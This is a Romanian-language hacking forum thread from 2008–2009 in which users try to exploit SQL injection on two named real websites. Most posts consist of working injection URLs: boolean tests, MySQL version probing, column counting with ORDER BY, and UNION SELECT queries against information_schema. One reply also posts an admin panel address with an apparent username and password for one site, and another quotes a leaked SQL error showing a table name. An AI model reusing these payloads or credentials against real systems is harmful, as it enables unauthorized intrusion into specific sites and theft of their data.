pacealik Posted December 29, 2008 Report Share Posted December 29, 2008 am gasit un site vulnerabil dar ma incurc la un moment datwww.compass.ro/ro/sectiune.php?s=253+and+1=1 mergewww.compass.ro/ro/sectiune.php?s=253+and+1=2 nu merge inseamna ca da tot din casacompass.ro/ro/sectiune.php?s=253+and+substring(@@version,1,1)=4 mysql v4compass.ro/ro/sectiune.php?s=253+and+(select+1)=1 select mergecompass.ro/ro/sectiune.php?s=253+order+by+8/* 8 coloanesi aici nu mai mergewww.compass.ro/ro/sectiune.php?s=253+union+all+select+group_concat(table_name),2,3,4,5,6,7,8+from%20information_schema.tables/*o idee ceva? Quote Link to comment Share on other sites More sharing options...
pacealik Posted December 29, 2008 Author Report Share Posted December 29, 2008 inca un site vulnerabil dar nu reusesc sa-l exploatezhttp://www.city-mall.ro/locatii.php?basecategory=1&filter2=1%27 Quote Link to comment Share on other sites More sharing options...
vfather Posted December 29, 2008 Report Share Posted December 29, 2008 http://www.compass.ro/ro/sectiune.php?s=5%20union%20all%20select%201,convert(version()%20using%20latin1),3,4,5,6,7,8--4.1.10-standardinformation_schema.tables > 5v, deci nu te poti folosi de asta pentru a afla tabelele(trebuie sa le ghicesti). Quote Link to comment Share on other sites More sharing options...
pacealik Posted December 29, 2008 Author Report Share Posted December 29, 2008 asta am zis si eu mai sus uite compass.ro/ro/sectiune.php?s=253+and+substring(@@version,1,1)=4 mysql v4nasol cu mysql 4 n-am cum dracu sa ii ghicesc tabelele Quote Link to comment Share on other sites More sharing options...
tw8 Posted January 2, 2009 Report Share Posted January 2, 2009 ^La compass.ro poti transforma SQLI-ul ala in alta vulnerabilitate - te las sa iti dai seama cum pentru ca gandirea nu strica niciodata.La celalalt, http://www.city-mall.ro/_admin/ , admin:george.Bafta . Quote Link to comment Share on other sites More sharing options...
pacealik Posted January 3, 2009 Author Report Share Posted January 3, 2009 salutms de replyzi`mi te rog cum ai exploatat city-mall.ro am incercat de mi-au sarit capacele nu am reusitsi la compass nu mi-at nici un indiciu ca sa pot sa`mi dau seamasalut Quote Link to comment Share on other sites More sharing options...
a13x4nd7u Posted January 4, 2009 Report Share Posted January 4, 2009 Poate ajuta:http://www.compass.ro/ro/sectiune.php?s=253+and+select+*+from+*Query failed: SELECT nume, titlu, continut, nume_fisier, ultima_actualizare, title, keywords, description FROM ro_sectiuni WHERE ID_sec = 253 and select * from * Quote Link to comment Share on other sites More sharing options...